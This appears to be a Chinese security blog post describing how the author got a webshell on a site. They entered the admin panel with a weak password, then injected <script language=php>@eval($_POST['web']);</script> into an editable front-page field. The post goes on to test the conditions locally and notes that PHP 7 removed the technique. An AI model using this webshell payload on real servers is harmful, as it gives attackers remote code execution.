关于js拿shell的尝试

  • A+
所属分类:安全文章

以前在测试一个网站的时候,大佬提供了一个拿shell的思路,通过js拿到了shell。

 

当时的情况是这样的,首页为*****/bin/home.php,通过弱口令进入后台,后台所有上传等可以拿shell的路都被阻止了,当时有一个可以控制前端页面的功能点

关于js拿shell的尝试

 

凭上面的解释就可以看出来,这个是可以通过这里来修改首页内容的,这里仅仅做一个小演示

关于js拿shell的尝试

关于js拿shell的尝试

 

可以发现js的代码是可以成功执行的,就可以通过了这个方法来拿shell了,因为js的language参数是可以支持其他的语言的执行的,具体的可以自己去尝试,这里我们使用的是

<script language=php>@eval($_POST['web']);</script>

我在本地进行一次测试,就可以展现出效果了

关于js拿shell的尝试

关于js拿shell的尝试

 

当时只是知道了这个方法,并没有对这个进行深入的了解,今天抽了点时间对这个重新进行了一次复盘

 

这个方法的利用条件的限制比较严格,必须要求被改变的位置是php文件,当时还是很懵的,并不知道为什么可以这样操作,所以我重新确定了一遍可以利用的条件点,看图就可以明白了。

 

fun.php 这个是数据库的调用

关于js拿shell的尝试

 

test.php

关于js拿shell的尝试

关于js拿shell的尝试

关于js拿shell的尝试

 

test1.php

关于js拿shell的尝试

关于js拿shell的尝试

 

test.html

关于js拿shell的尝试

关于js拿shell的尝试

 

好了,利用条件已经很明确了,必须要php下确实存在的才可以被利用,这个方法可用完全是因为php支持html的原因,也算是多一个方法了,php7移除该方法

发表评论

:?: :razz: :sad: :evil: :!: :smile: :oops: :grin: :eek: :shock: :???: :cool: :lol: :mad: :twisted: :roll: :wink: :idea: :arrow: :neutral: :cry: :mrgreen: